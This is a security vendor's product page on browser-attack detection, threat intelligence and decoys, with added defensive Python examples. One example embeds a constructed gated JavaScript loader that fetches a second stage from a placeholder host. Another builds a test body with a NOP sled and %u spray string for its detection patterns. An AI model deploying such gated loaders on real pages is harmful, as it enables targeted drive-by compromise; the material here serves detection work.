DEKENEAS NEXT-GEN TECHNOLOGIES is a cybersecurity company whose aim is to provide the means and methods needed to address the newest and most complex cyber attacks facing organizations and individuals in today's ever-changing threat landscape. Our products encompass more than 30 years of experience in both offensive and defensive fields of operations and were born from the actual needs security professionals encounter while facing real-life attackers. Our flagship product, the Browser Attack Detector, is an artificial-intelligence-powered web malware scanner able to discover known and unknown attacks against browsers, such as exploits, watering holes, cryptojacking or data skimming, on laptops, desktops, mobile or IoT devices. The concept behind the Browser Attack Detector was presented at multiple esteemed cybersecurity conferences around the world, and among the early adopters of this technology are companies such as ORANGE ROMANIA COMMUNICATIONS SA and public institutions such as the Romanian National Cybersecurity Directorate. Alongside the Browser Attack Detector we also provide our customers with a cyber threat intelligence platform that collects data about attacks against traditional technologies, but also about attacks against ICS/SCADA, medical or IoT technologies, and a decoy system ("Am I Owned") that transforms your networks and devices into honey traps that lure attackers, making them reveal their presence on the premises before they are able to perform any actual damaging actions. For more information about our products consult the detailed presentations for Browser Attack Detector, Cyber Threat Intelligence and Am I Owned, or contact us.
BROWSER ATTACKS
Browser attacks are currently some of the most elusive and hard-to-detect attacks in cyberspace. They do not require the attacker to have previous interactions with the victims, such as sending them e-mails, social media or text messages with spearphishing payloads; they just need the victim to visit the malicious page. And most of the time the malicious pages are the usual pages of legitimate and well-established websites, with many visitors every day, weaponized with a malicious implant. Some of these attacks mine cryptocurrency using visitors' browsers (cryptojacking), others steal credit card information (data skimming), and others, the most dangerous ones, can take full control of the visitor's device (browser exploits), even if the browser is fully updated. Browser attacks focus on traditional devices, such as laptops or desktops, but they also target mobile or IoT devices, which makes them even harder to detect.
Browser exploits
Browser exploits are programs specially crafted to exploit vulnerabilities inside browsers or technologies used by browsers. A browser exploit can take full control of the attacked device. Lately, browser exploits have become the preferred tactic of APT and cybercriminal groups, as they are very hard to detect; some of them have been actively exploiting victims for many months, and even years. Browser exploits can target specific technologies (such as phone makers, browser types, etc.), specific IP addresses, specific browser languages, etc., which makes them even harder to detect through traditional methods.
Cryptojacking
Malicious cryptojacking implants inside legitimate websites use the visitor's device computing power in order to mine various cryptocurrencies. This behaviour introduces latency and degrades the overall performance of the device.
Data skimming
Data skimming is a web attack in which a malicious implant inside a legitimate e-shop collects the credit card information submitted by the visitor and sends it to the attacker.
THE PROBLEM
The HTTP/S and HTML protocols have different implementations in different browsers, mainly because HTTP was standardized as a protocol years after browsers emerged, allowing each browser engine to have its own implementation and interpretation of these protocols.
With the introduction of JavaScript, web pages began to act dynamically instead of serving static content. This means that the final form of a website is only known once all of its JavaScript has been executed in the user's browser context. It also means that a security product must know exactly how the user's browser interprets and executes the JavaScript in the page it loads.
Traditional antivirus products or intrusion detection sensors use signature scanning to identify browser attacks, looking for known code snippets involved in these attacks. But in recent years browser attacks have moved to JavaScript obfuscation to hide the relevant code snippets, making it impossible for traditional security products to detect such attacks.
To counter this, traditional security products try to detect the signature of the actual exploit, or the aftermath of the attack, such as the connection to the command and control server. But if the exploit is unknown or very new, there is no signature for it, and if the command and control channel does not look suspicious, for instance a DNS request or an HTTPS connection to a legitimate but compromised website, the attack goes totally undetected.
So the only solution seems to be client-side honeypots, which emulate browsers and access websites hoping to find browser attacks. But this approach is very time-consuming, as modern websites can have hundreds or thousands of pages, and loading each and every one of them in an instrumented environment takes time. Also, attackers have developed a series of methods to identify instrumented environments, ranging from delayed execution to detection of virtualized environments, which are specific to client-side honeypots. On top of that, attackers fingerprint the browser and only attack certain browsers, certain technologies, or users from a certain geographical area or IP range.
If the client-side honeypot does not guess all of the above, the attack never happens, so the security product fails to identify the offensive web page.
Do browser attacks actually happen?
Unfortunately, yes. Tens of unknown attacks that compromise devices are discovered in the wild every year, and we can safely assume many others remain undetected. Due to their specifics, browser exploits are perfect candidates for penetrating highly secured networks of banks, the defense industry or government contractors, tech giants such as Facebook, Apple, Twitter or Microsoft, but also activist groups, investigative journalists or political dissidents all over the world.
This is possible because browsers are very complex pieces of software with a huge attack surface. While some vulnerabilities get reported and patches are issued, many more never get reported and are weaponized by attackers as 0day exploits. Other times, even if the attack is known, there is a gap of months between the actual browser update and the moment when, for instance, mobile vendors ship the update to their users. This way, even if the attack is reported and a patch was issued, certain users are still vulnerable to the attack as if it were 0day.
Most of the time the victims realize they have been compromised only after a very long period, sometimes years, sometimes never, and when they do realize the attack happened it is usually because of luck or coincidence.
Some other times, browser attacks are simply used to mine cryptocurrencies, while other times they are used to steal credit card data from unsuspecting users, such is the case with Magecart attack campaigns.
THE SOLUTION - DEKENEAS BROWSER ATTACK DETECTOR
DEKENEAS uses artificial intelligence to understand the contents of a web page, looking for signs and behaviour of malicious activity. Such malicious activity could be the use of encryption or certain coding patterns that are highly specific to malware. Techniques such as symbolic execution or the "Code Logic Emulator (CLE)" allow a better understanding of what the code does before deciding to analyze it further with "Smart Dynamic Analysis". The "Smart Dynamic Analysis" technology is much more intensive and time-consuming, therefore it is only used to confirm whether certain elements within the website are actually malicious or not.
If a certain element within the website shows signs of malicious behaviour, our "Requirements Extractor (RX)" technology tries to determine whether that element needs certain conditions to run, such as specific user agents, IP addresses or language settings. If RX identifies requirements that the element needs in order to run, then the "Smart Dynamic Analysis (SDA)" technology dynamically analyzes that element in the specific environment requested. For instance, if RX identifies a suspicious JavaScript with conditions for a specific iOS mobile browser user agent and specific language settings, SDA will analyze the suspicious JavaScript in an iOS environment, with the requested browser and those specific language settings.
This greatly reduces analysis time, as only suspicious HTML elements are analyzed, while at the same time maximizing detection accuracy by creating the specific environment requested by the website code.
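As an added illustration of what a requirements extractor has to do (example code written for this page, not DEKENEAS's own RX), the following Python scans a constructed, gated loader for the environment probes it reads (navigator.userAgent, navigator.language, screen.width, and so on) and the literals it compares them against. The result is the set of conditions a client-side honeypot would have had to guess blindly, as described under THE PROBLEM, expressed as the sandbox settings the element needs in order to run. The probe table, the sample script and the regular expressions are assumptions for this example; a production extractor would work on a parsed syntax tree rather than on regular expressions.

```python
import re

# Constructed sample of a gated loader, written for this example (not real implant code):
# the second stage is only fetched for one iOS Safari build, a Romanian locale and a
# phone-sized screen, the kind of gating the RX description refers to.
SAMPLE_JS = r'''
var ua = navigator.userAgent;
if (ua.indexOf("iPhone OS 15_4") !== -1 && /Safari/.test(ua)
    && navigator.language === "ro-RO" && screen.width < 500) {
    var s = document.createElement("script");
    s.src = "https://stage2.example.invalid/loader.js";   // placeholder host
    document.head.appendChild(s);
}
'''

# Environment probes a script can read, mapped to the sandbox setting each one constrains
# (assumed table; extend it with whatever probes your corpus shows).
PROBES = {
    "navigator.userAgent": "user_agent",
    "navigator.platform": "platform",
    "navigator.language": "language",
    "navigator.languages": "language",
    "screen.width": "screen",
    "screen.height": "screen",
    "Intl.DateTimeFormat().resolvedOptions().timeZone": "timezone",
}


def _aliases(js):
    """Local names assigned straight from a probe, e.g. `var ua = navigator.userAgent`."""
    return {m.group(1): m.group(2)
            for m in re.finditer(r'\b(?:var|let|const)\s+(\w+)\s*=\s*([\w.()]+)', js)
            if m.group(2) in PROBES}


def _constraints(js, subject):
    """Literals the subject is compared against, in the forms gated loaders commonly use."""
    s = re.escape(subject)
    found = set()
    # subject.indexOf("lit") / subject.includes("lit") / subject.startsWith("lit")
    found.update(re.findall(r'\b' + s + r'\.(?:indexOf|includes|startsWith)\(\s*"([^"]*)"', js))
    # subject === "lit", subject != "lit", ...
    found.update(re.findall(r'\b' + s + r'\s*[!=]==?\s*"([^"]*)"', js))
    # /regex/.test(subject)
    found.update("/%s/" % r for r in re.findall(r'/([^/\n]+)/[a-z]*\.test\(\s*' + s + r'\s*\)', js))
    # subject < 500, subject >= 1080, ...
    found.update(op + n for op, n in re.findall(r'\b' + s + r'\s*([<>]=?)\s*(\d+)', js))
    return found


def extract_requirements(js):
    """Return {sandbox_setting: sorted constraints} for every probe the script reads."""
    subjects = {p: p for p in PROBES}
    subjects.update(_aliases(js))            # alias name -> probe it was read from
    req = {}
    for subject, probe in subjects.items():
        if not re.search(r'\b' + re.escape(subject) + r'\b', js):
            continue                          # this probe is never read by the script
        setting = PROBES[probe]
        req.setdefault(setting, set()).update(_constraints(js, subject))
    return {k: sorted(v) for k, v in req.items()}


def is_gated(js):
    """True when the script compares at least one environment probe against a literal."""
    return any(extract_requirements(js).values())


if __name__ == "__main__":
    print(extract_requirements(SAMPLE_JS))
```

A script that merely reads navigator.userAgent (for analytics, say) yields a setting with no constraints and is not reported as gated; only a comparison against a literal is. The extracted constraints are what the sandbox has to satisfy: a user agent containing "iPhone OS 15_4" and matching /Safari/, language ro-RO and a screen narrower than 500 pixels.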
The network traffic resulting from the interaction with the malicious HTML element is recorded and analyzed with the "Network Attack Detector (NAD)" technology, which identifies attack signs inside the network traffic.
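An added example, not NAD itself, of the simplest checks one can run over a decrypted HTTP body once the traffic has been recorded: a long unbroken run of 0x90 bytes (the classic NOP sled) and long runs of %uXXXX escapes, the shape in which shellcode and spray strings are usually embedded in JavaScript. The thresholds and the two constructed bodies are assumptions for this example.

```python
import re

NOP = 0x90
MIN_NOP_RUN = 32      # assumption: tune per deployment; short runs occur in benign padding
MIN_ESCAPES = 16      # assumption: 16+ consecutive %uXXXX escapes is shellcode/spray-shaped

# Long runs of %uXXXX escapes; built by concatenation because "%u" is itself a
# bytes-formatting directive and must not go through the % operator.
ESCAPE_RUN = re.compile(rb'(?:%u[0-9a-fA-F]{4}){' + str(MIN_ESCAPES).encode() + rb',}')


def longest_byte_run(data, value):
    """Length of the longest unbroken run of `value` in `data`."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == value else 0
        if cur > best:
            best = cur
    return best


def escape_run_lengths(data):
    """Number of escapes in each long %uXXXX sequence found in `data`."""
    return [len(m.group(0)) // 6 for m in ESCAPE_RUN.finditer(data)]


def scan_body(body):
    """Indicators found in one decrypted HTTP body, as a list of (indicator, size)."""
    findings = []
    nops = longest_byte_run(body, NOP)
    if nops >= MIN_NOP_RUN:
        findings.append(("nop_sled", nops))
    for n in escape_run_lengths(body):
        findings.append(("unicode_escape_string", n))
    return findings


# Constructed bodies for the example, not captured traffic.
BENIGN_BODY = b"<html><body><script>document.title = 'welcome';</script></body></html>"
SUSPECT_BODY = (b"<script>var p = unescape(\"" + b"%u4141" * 20 + b"\");</script>"
                + b"\x90" * 64 + b"\xcc")

if __name__ == "__main__":
    for name, body in (("benign", BENIGN_BODY), ("suspect", SUSPECT_BODY)):
        print(name, scan_body(body))
```

Both checks are deliberately narrow: a sled built from single-byte NOP equivalents, or a payload delivered as plain hex or base64 text, passes them untouched. They are the starting point for a traffic scanner that runs after TLS termination, not a substitute for the wider set of indicators the text lists.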
These unique features allowed DEKENEAS to uncover a series of complex attacks carried by APT groups, but also carried by cybercriminals, all of them using either very new or unknown exploitation vectors.
WHAT IS CYBER THREAT INTELLIGENCE (CTI)
Today’s cybersecurity climate is constantly evolving and changing, with new threats and new threat actors emerging almost every day. From ransomware gangs to Advanced Persistent Threat nation-state actors, from financially motivated cybercrime gangs to the lone wolf hacker hacking from his mother’s basement, the Internet is a dark place with unknown threats waiting to attack the next victim. Traditional antivirus products and security devices can no longer keep up with the growing complexity of the threats they face. Cyber Threat Intelligence is knowing who these threats are and what techniques, methods or tools they use, in order to be able to defend against them even before they attack your infrastructure and cause significant damage to your business.
THE RIGHT CYBER THREAT INTELLIGENCE FEED
There are many Cyber Threat Intelligence feeds available, but how do you choose the right one for you? The right Cyber Threat Intelligence feed should be relevant to your geographical location, relevant to your industry sector and relevant to the technologies you are using, and it should be judged on its percentage of unique data, the periodicity of its data and its measurable outcome. This matters because Cyber Threat Intelligence feeds tend to contain a lot of Indicators of Compromise (IOCs), and each IOC comes with a cost to the device in terms of resources. You do not necessarily need information about attackers targeting the Middle East if you operate in Europe, and you are not that interested in attackers targeting the energy sector if you operate in pharma. You do not necessarily need IOCs for SMB if your network does not have Samba. And you want a CTI feed with a high percentage of unique data, because many commercial feeds simply compile open-source feeds. While open-source feeds are of great value to the community, their downside is that they are not maintained and sometimes contain old IOCs that are no longer relevant to today’s climate.
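To make the selection criteria above measurable, here is an added example (not DEKENEAS code) that scores a constructed commercial feed against a constructed set of open-source indicators and filters it for a European pharma operator whose perimeter exposes SSH and HTTP but runs no Samba. The record fields, the indicator values and the 90-day staleness threshold are assumptions for this example.

```python
from datetime import date

# Constructed indicator records, not real IOCs. A feed record is assumed to carry the region
# and sector of the attack it came from, the technology targeted, and when it was last seen.
COMMERCIAL_FEED = [
    {"ioc": "203.0.113.10", "type": "ip",     "region": "EU", "sector": "pharma", "tech": "ssh",    "last_seen": "2023-11-02"},
    {"ioc": "198.51.100.7", "type": "ip",     "region": "ME", "sector": "energy", "tech": "modbus", "last_seen": "2023-10-28"},
    {"ioc": "bad.example",  "type": "domain", "region": "EU", "sector": "pharma", "tech": "http",   "last_seen": "2023-11-05"},
    {"ioc": "192.0.2.44",   "type": "ip",     "region": "EU", "sector": "pharma", "tech": "smb",    "last_seen": "2023-09-01"},
    {"ioc": "old.example",  "type": "domain", "region": "EU", "sector": "pharma", "tech": "http",   "last_seen": "2021-03-14"},
]

# Indicators already published in open-source feeds (constructed).
OPEN_SOURCE_IOCS = {"198.51.100.7", "old.example", "192.0.2.200"}

# Who we are: a European pharma operator exposing SSH and HTTP, with no SMB/Samba anywhere.
PROFILE = {"region": "EU", "sector": "pharma", "tech": {"ssh", "http"}}


def unique_ratio(feed, public):
    """Share of the feed's indicators that are not simply copied from open-source feeds."""
    if not feed:
        return 0.0
    return sum(r["ioc"] not in public for r in feed) / len(feed)


def relevant_iocs(feed, profile, today, max_age_days=90):
    """Indicators worth loading: matching region, sector and deployed technology, not stale."""
    kept = []
    for r in feed:
        age_days = (today - date.fromisoformat(r["last_seen"])).days
        if r["region"] != profile["region"] or r["sector"] != profile["sector"]:
            continue                      # attacks on another region or sector
        if r["tech"] not in profile["tech"]:
            continue                      # e.g. SMB indicators when there is no Samba to hit
        if age_days > max_age_days:
            continue                      # stale indicator, no longer relevant
        kept.append(r["ioc"])
    return kept


def load_reduction(feed, profile, today):
    """Fraction of the feed we avoid loading onto the device by filtering it."""
    return 1 - len(relevant_iocs(feed, profile, today)) / len(feed)


if __name__ == "__main__":
    today = date(2023, 11, 10)
    print("unique:", unique_ratio(COMMERCIAL_FEED, OPEN_SOURCE_IOCS))
    print("relevant:", relevant_iocs(COMMERCIAL_FEED, PROFILE, today))
    print("dropped:", load_reduction(COMMERCIAL_FEED, PROFILE, today))
```

On this data three of five indicators are unique to the feed, and only two survive the relevance and age filters, so 60% of the feed would have consumed device resources without ever being able to match anything on this network.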
DEKENEAS CYBER THREAT INTELLIGENCE
DEKENEAS NEXT-GEN TECHNOLOGIES, in partnership with ORANGE ROMANIA COMMUNICATIONS, operates a network telescope and a vast network of honeypots with low, medium and high levels of interaction, for generic services such as HTTP/S, DNS, SMTP, SSH, TELNET, etc., but also for ICS/SCADA and IoT devices specific to certain industries such as pharma, energy, financial, etc. We use the network telescope to understand the latest trends in service attacks in order to be able to deploy, if needed, new or custom honeypots specific to the attacks we observe. Also, on request we can deploy a honeypot for a specific service you require. Our system collects IP addresses or domains involved in attacks, command and control IP addresses or domains, attacked service information, file names and hashes. All this information is made available to our customers through a threat intelligence feed, accessible through our API endpoint.
AVERAGE TIME TO DETECT AND CONTAIN A BREACH IS 287 DAYS
Safeguarding data is a continual process fraught with challenges, and a breach in the protection of that data can have major repercussions. Detecting and reporting a breach in a timely manner is crucial to maintaining compliance standards and ensuring the integrity of an organization’s data. Though many breaches are detected in a timely manner, it is an unfortunate reality that the majority of organizations take months or even years before detecting a breach. In 2019, security teams at Verizon released the Verizon Data Breach Investigations Report, an analysis of many of the year’s big data breaches across organizations. A total of 41,686 security incidents were analyzed in the report, shining a light on a grim reality: while cybercriminals’ first steps towards compromising customer information and data can happen in a span of minutes, discovering the breach often takes months. Using the data from the analyzed incidents, Verizon’s security teams determined that a total of 56 percent of breaches took months or even years to detect – a significant sample size given the enormity of cyberspace that the 41,686 analyzed incidents represent. This revelation tells us of the growing level of impact a well-established system of governance can have for an organization – a system by which attacks can be properly mitigated and reported to save precious time in recovering from a breach. Blue teams regularly engage in the mission of preventing attacks from occurring, but having the systems to detect a breach in progress – assuming preventative measures have failed – is just as critical to ensure the integrity of an organization’s systems and the confidentiality of customer data.
TRACING THE STEPS
Data breaches and cyberattacks are not singular events. They are an ongoing process with multiple steps. The first step usually is infiltration, during which an attacker gains a foothold in the network. Infiltration can happen in many ways. It can come by way of targeted credential theft, exploiting vulnerable web applications, third party credential theft, malware, and more. The next step is usually reconnaissance. This is where attackers try to understand what the network architecture is, what access they have via stolen credentials, and where sensitive data is stored. Compare this to thieves breaking into a house in the middle of the night. The first thing they do is check the house's layout and determine where the valuables are being kept. Once attackers are done with basic reconnaissance, usually they will attempt lateral expansion in the network. They move within the network into a higher tier with better access, perform privilege escalation to gain permissions with wider access, acquire sensitive data, and finally exfiltrate it outside the network. These steps take weeks and months to progress, performed via a painstaking trial-and-error process by attackers, as they strive to identify sensitive resources and expand within the network. Usually, in the case of a cyber-attack, we hear only of the first and last steps – infiltration into the network and data exfiltration. But during the steps in between, there is a whole world of activity that often goes unnoticed.
AM I OWNED
We do not provide another network monitoring tool. These tools are known to have problems detecting complex attacks, and sometimes they even unwillingly help the attackers through security holes in their own code. While we acknowledge the importance of intrusion detection sensors and traffic monitoring instruments, we also found that most of the time, in practice, this is not enough, as even the best ones produce a lot of false positives and “noise” traffic, generating significant information fatigue and making it difficult for the analyst to pinpoint the malicious activities. What we do instead is give the attackers what they are looking for: juicy documents, user accounts and credentials, database access, etc. But with a twist: all these resources are decoys, specifically crafted to “call home” when accessed, just like a tripwire alarm. This forces the attacker to reveal himself before being able to mount further, more damaging attacks against the network and devices, gives the beneficiary the actionable intelligence needed to counter the threat in a timely manner, and at the same time gives the blue team a clear timeline of the attack, based on the chronology of decoys triggered.
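The “call home” events are only useful if someone turns them into the timeline and the list of hosts to isolate that the paragraph above describes. The following Python, added here as an example and not part of the Am I Owned product, does that for a constructed decoy inventory and a constructed alert stream; the beacon line format, the inventory and the addresses are assumptions for this example.

```python
from datetime import datetime

# Decoy inventory, constructed for this example: what was planted, what kind of asset it
# imitates and where it lives. Only the defender holds this mapping.
DECOYS = {
    "svc-backup-ro":          {"kind": "ad_account", "host": "dc01"},
    "Q3-payroll.xlsx":        {"kind": "office_doc", "host": "ws-finance-07"},
    "board-minutes-2023.pdf": {"kind": "pdf_doc",    "host": "ws-finance-07"},
    "legacy-erp-db":          {"kind": "db_creds",   "host": "app02"},
}

# Constructed "call home" records in the shape a decoy beacon might report:
# UTC timestamp, decoy name, source address that touched it. Not real data.
ALERTS = """\
2024-01-15T23:41:02Z svc-backup-ro 10.20.5.33
2024-01-15T23:47:19Z Q3-payroll.xlsx 10.20.5.33
2024-01-15T23:48:05Z board-minutes-2023.pdf 10.20.5.33
2024-01-16T00:12:44Z legacy-erp-db 10.20.9.8
2024-01-16T00:13:00Z not-a-decoy 10.20.9.8
"""


def parse_alerts(text):
    """Parse beacon lines, keep only names from the inventory, return them in time order."""
    events = []
    for line in text.splitlines():
        ts, name, src = line.split()
        if name not in DECOYS:
            continue                      # not something we planted: noise, not a trigger
        events.append({"time": datetime.fromisoformat(ts.replace("Z", "+00:00")),
                       "decoy": name, "src": src, **DECOYS[name]})
    return sorted(events, key=lambda e: e["time"])


def timeline(events):
    """Chronology of triggered decoys: (time, decoy kind, host it lived on, source address)."""
    return [(e["time"].isoformat(), e["kind"], e["host"], e["src"]) for e in events]


def hosts_to_isolate(events):
    """Source addresses that touched more than one decoy, ordered by their first trigger."""
    first_seen, counts = {}, {}
    for e in events:
        first_seen.setdefault(e["src"], e["time"])
        counts[e["src"]] = counts.get(e["src"], 0) + 1
    return sorted((s for s, n in counts.items() if n > 1), key=first_seen.get)


def observed_window_seconds(events):
    """Time between the first and the latest decoy trigger."""
    if not events:
        return 0.0
    return (events[-1]["time"] - events[0]["time"]).total_seconds()


if __name__ == "__main__":
    evs = parse_alerts(ALERTS)
    for row in timeline(evs):
        print(*row)
    print("isolate first:", hosts_to_isolate(evs))
    print("window (s):", observed_window_seconds(evs))
```

The first trigger is the Active Directory decoy, followed within minutes by the documents on the same finance workstation, which is the pattern the BlackByteNT case on this page describes; the host that touched several decoys is the one to isolate first, and the window between first and latest trigger is the time the responders had before the attacker moved on.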
22.08.2024
"Google Fixes High-Severity Chrome Flaw Actively Exploited in the Wild" https://www.dekeneas.com/blog/220824.html
9.11.2023
"DATA SKIMMING ATTACKS: HOW YOUR CREDIT CARD DATA GETS STOLEN FROM E-COMMERCE SITES" https://www.dekeneas.com/blog/data-skimming.html
5.10.2023
"UNMASKING HIDDEN THREATS IN TRADITIONAL TECHNOLOGIES" https://www.dekeneas.com/blog/unmasking-hidden-threats.html
19.09.2023
"THE ROLE OF ARTIFICIAL INTELLIGENCE IN DETECTING WEB MALWARE" https://www.dekeneas.com/blog/role-of-ai-in-detecting-web-malware.html
12.09.2023
"THE EVOLUTION OF CYBER ATTACKS: FROM BASIC HACKS TO SOPHISTICATED EXPLOITS" https://www.dekeneas.com/blog/evolution-of-cyber-attacks.html
07.09.2023
"ALL YOU NEED TO KNOW ABOUT WATERING HOLE ATTACKS" https://www.dekeneas.com/blog/what-are-watering-hole-attacks.html
08.03.2023 -- TODAY WE SAVED OUR CUSTOMER FROM BLACKBYTENT RANSOMWARE
One of the customers of the AIO (AM I OWNED) product was alerted late last night by some of the decoys deployed inside their infrastructure. Specifically, the first alert was triggered by an Active Directory decoy, soon followed by the triggering of various Microsoft Office and PDF decoys placed on a certain workstation inside their network. The incident response team was able to determine with precision the compromised workstation, isolating it from the network and recovering the binaries used by the threat actors. After carefully investigating the binaries we were able to assert with certainty that they were part of a BlackByteNT ransomware campaign. Also, the incident response team was able to determine that initial access was obtained through a malicious Microsoft Office document sent by e-mail (CVE-2023-21716).
06.12.2022 -- ROMANIAN PUBLIC INSTITUTION WEBSITE USED IN WATERING HOLE ATTACK
A Romanian public institution in the Cluj area was used in a watering hole attack. The exploit was a type confusion bug in V8 affecting Chrome and Microsoft Edge on Windows, Linux and MacOS, and it was patched in the latest Chrome, version 108.0.5359.94 for Mac and Linux, and 108.0.5359.94 or 108.0.5359.95 for Windows. We were able to obtain the full exploitation chain and also the second-stage malware thanks to #Dekeneas next-gen dynamic analysis. We have not been able to perform accurate attribution for this attack. Other websites may be hosting the same attack code, as we discovered this particular attack while one of our users was visiting the watering hole website.
14.11.2022 -- NEW PRODUCTS ADDED
DEKENEAS products:
- Browser Attack Detector: can detect cryptojacking attacks (unauthorized use of the browser to mine cryptocurrencies), data skimming attacks (credit card stealing implants, usually in web shops) or known and unknown exploit attacks against Chrome, Firefox, Edge and Safari, for desktops/laptops/servers but also for mobile (Android and iOS) or IoT devices.
- Cyber Threat Intelligence (NEW): custom-tailored CTI feed collected from a network of hundreds of devices (honeypots with low, medium or high interaction) covering more than 60 different technologies, from generic technologies such as HTTP or SSH to ICS/SCADA or IoT technologies.
- Am I Owned (NEW): we can transform virtually any asset in your network or device into a decoy appealing to hackers. When attackers compromise such an asset you get an alert, knowing something unauthorized is happening, long before the attacker can impact your organization.
- Phishing Attack Detection (NEW): actively detecting phishing campaigns aimed at your organization, also providing analysis and takedown services.
22.02.2022 -- DEKENEAS 2.0 RELEASED
We are thrilled to announce the release of DEKENEAS 2.0, three years after DEKENEAS 1.0 first introduced the concept of using machine learning to detect browser attacks and malicious web implants. The experience we gathered allowed us to better understand the tactics, techniques and procedures used by skilled actors to exploit and attack browser technologies, and while we constantly improve the technologies used to detect, identify and analyze web-based threats, the new release brings a total rewrite from scratch of the whole project, with new approaches and technologies. As a result, we added new instructions and code constructs used in malicious implants to our detection algorithm, we developed a new technology called "Code Logic Emulator (CLE)", we improved the "Requirements Extractor (RX)" technology, we replaced the old JavaScript sandbox with "Smart Dynamic Analysis (SDA)" for both mobile and desktop environments, supporting various browsers for Windows, Linux, MacOS, Android or iOS, and last, but not least, we added the "Network Attack Detector (NAD)", which is also a novel technology aiming to identify exploitation attempts in network traffic.
Code Logic Emulator
"Code Logic Emulator" (CLE) is a technology we developed in order to maximize the detection probability of malicious web implants by emulating the logic behind the code, without the need to emulate the code itself, before deciding to analyze it inside a sandbox environment. Understanding the logic behind the suspicious code adds a great number of new features to the malicious features dataset, which is used to describe the behaviour of a malicious implant, therefore giving a more accurate picture of the functionality of the code.
Requirements Extractor
"Requirements Extractor" (RX) is a technology used to identify whether the code under scrutiny requires specific conditions to run, such as certain user agents, browser settings, language settings, IP address space, etc. This information is used both as features in the malicious features dataset and to know a priori what kind of sandbox environment to start for this specific piece of code. This technology greatly reduces the probability of missing certain malicious activities due to analysis performed in the wrong environment.
Smart Dynamic Analysis
One of the most important improvements we made to the DEKENEAS platform is the implementation of native sandboxes. We designed and created sandboxes for the Linux, Windows and MacOS operating systems used on classical desktop devices, but also sandboxes for mobile devices running iOS and Android. The sandboxes support the various browser technologies specific to each platform and deploy methods and techniques to deter identification of the analysis environment by making it appear legitimate. This includes, but is not limited to, user interactions, screen sizes, apps and programs installed, etc.
Network Attack Detector
The "Network Attack Detector" (NAD) is a novel technology able to identify attacks in network traffic. The "Network Attack Detector" decrypts the network traffic between the client browser and the web server and scans for various indicators of exploitation such as NOP sleds, heap spraying, shellcode and other specific indicators of attacks or compromises.
All these technologies work together to give better insight into and understanding of how attacks are performed, providing a holistic approach to the identification and analysis of browser attacks, both on traditional devices such as personal computers or laptops and on mobile devices such as smartphones or tablets. Happy hunting!
CONTACT US
office@dekeneas.com @dekeneas @dekeneas
FREQUENTLY ASKED QUESTIONS
Q: Who is at risk of getting attacked through browser exploits?
A: Considering that browsers are part of our day-to-day activities, whether for work or pleasure, anyone can be targeted with a browser exploit. However, if you work in a sensitive environment and your job requires you to have access to sensitive organizational resources, the risk of being attacked with a browser exploit increases significantly. But browser exploits are not the only browser attacks.
Q: How could a browser exploit affect my work place?
A: Organizational network defenses have become increasingly performant in the past years, with organizations allocating increased budgets to cybersecurity, therefore making it harder for attackers to directly attack the organization's network perimeter. At the same time, organizations tend not to address the insider threat with the same resilience. Therefore, if a smartphone, laptop or tablet you use to access organizational resources is compromised through a browser exploit, the attackers gain a foothold inside the network.
Q: What other browser attacks are out there, besides device compromises through exploits?
A: While browser exploits are the most dangerous type of browser attack, there are also cryptojacking attacks and data skimming attacks. Cryptojacking attacks use your device to mine cryptocurrencies, consuming your CPU cycles for the benefit of the attackers. Data skimming attacks are usually placed in online shops or other types of websites which require the user to enter banking or credit card information. They are totally invisible to the end user and to any security product they may use, and they collect this information to be sent to the attackers. Cybercriminal groups such as Magecart have been getting the spotlight in the past years, but these types of attacks have been going on for at least a decade and they continue to affect hundreds of thousands of websites around the world.
Q: My antivirus is updated to the latest. Am I still vulnerable?
A: Unfortunately yes. Antivirus products use signatures to detect attacks. If a signature has not been previously generated, the attack goes unnoticed by the antivirus product.
Q: I have the latest next-generation detection and response endpoint protection. Am I still vulnerable?
A: Unfortunately yes. Even the most performant XDR endpoint protection uses some type of signature scanning corroborated with behavioral analysis and even artificial intelligence (AI). However, they cannot be installed on smart phones, tablets or IoT devices. And even for traditional systems, such as desktops or laptops they fail to accurately identify attacks, mostly because browsers are very difficult to inspect and instrument and because these attacks are specifically crafted to look like normal user activities.
Q: I only browse behind my corporate network. Am I still vulnerable?
A: Unfortunately yes. Network defense systems are unable to properly inspect HTTP/S traffic, even if they are able to decrypt the encrypted communication. Dynamic HTML code, such as JavaScript, makes it impossible for an intermediate product to know how the final code will be rendered inside the user's browser, therefore they are unable to tell whether an attack is happening or not. This is how big banks and corporations have been compromised in the past.
Q: I use a different web malware scanner. Isn't that enough?
A: Unfortunately no. All the commercially available web malware scanners use signature scanning to detect attacks against browsers. While this approach is sufficient to detect known attacks, they have no way of detecting unknown attacks. Most web malware today is crafted in such way that it looks different for every infection, even inside the same website. Also, most of the commercially available web malware scanners only scan the first page of the website, while in reality the attack can be hidden deeper inside the website.
Q: OK, so how does DEKENEAS do it then?
A: We have an artificial intelligence (AI) algorithm trained to recognize features that might serve a malicious purpose. We do not consider these features separately: our AI tries to understand how these features could be used in conjunction to serve a malicious purpose. This approach allows us to select only those HTML elements, such as scripts or iframes, that have a high risk of being used for malicious purposes. After this filtering, we launch each suspicious element inside a dynamic analysis environment which mimics in the smallest detail the behaviour of a legitimate user, in order to bypass any anti-analysis or instrumentation-environment detection techniques the malware might use. We record these interactions and we also record all the traffic exchanged between our dynamic analysis environment and the suspicious HTML element. The recorded traffic is analyzed by another AI algorithm in order to determine whether there are any signs of attacks inside the traffic. If there were no interactions during the dynamic analysis and no signs of attack inside the recorded network traffic, we still consider the element suspicious, needing manual analysis by one of our specialists.
Q: So every suspicious script is possibly an attack?
A: Sometimes, yes. Some other times, no. There could be an attack that evaded our dynamic analysis environment, and it needs further inspection, but also, sometimes, not very often, legitimate HTML elements use the same techniques as malware and we detect that. But it's better to be safe than sorry.
Q: I started my scan a few hours ago and it still did not finish. Is there something wrong?
A: Normal websites have thousands of pages, each of these pages containing tens or hundreds of HTML elements that need to be analyzed. Even though our AI does a fantastic job of eliminating benign-looking elements, there are still tens or hundreds of elements that need to be passed to our dynamic analysis environment. This is the most time-consuming part of the process, as we try to mimic in the smallest detail the behavior of a normal user. So, especially on the first iteration, a scan can last for a few hours, depending on the number of suspicious HTML elements found.
DEKENEAS
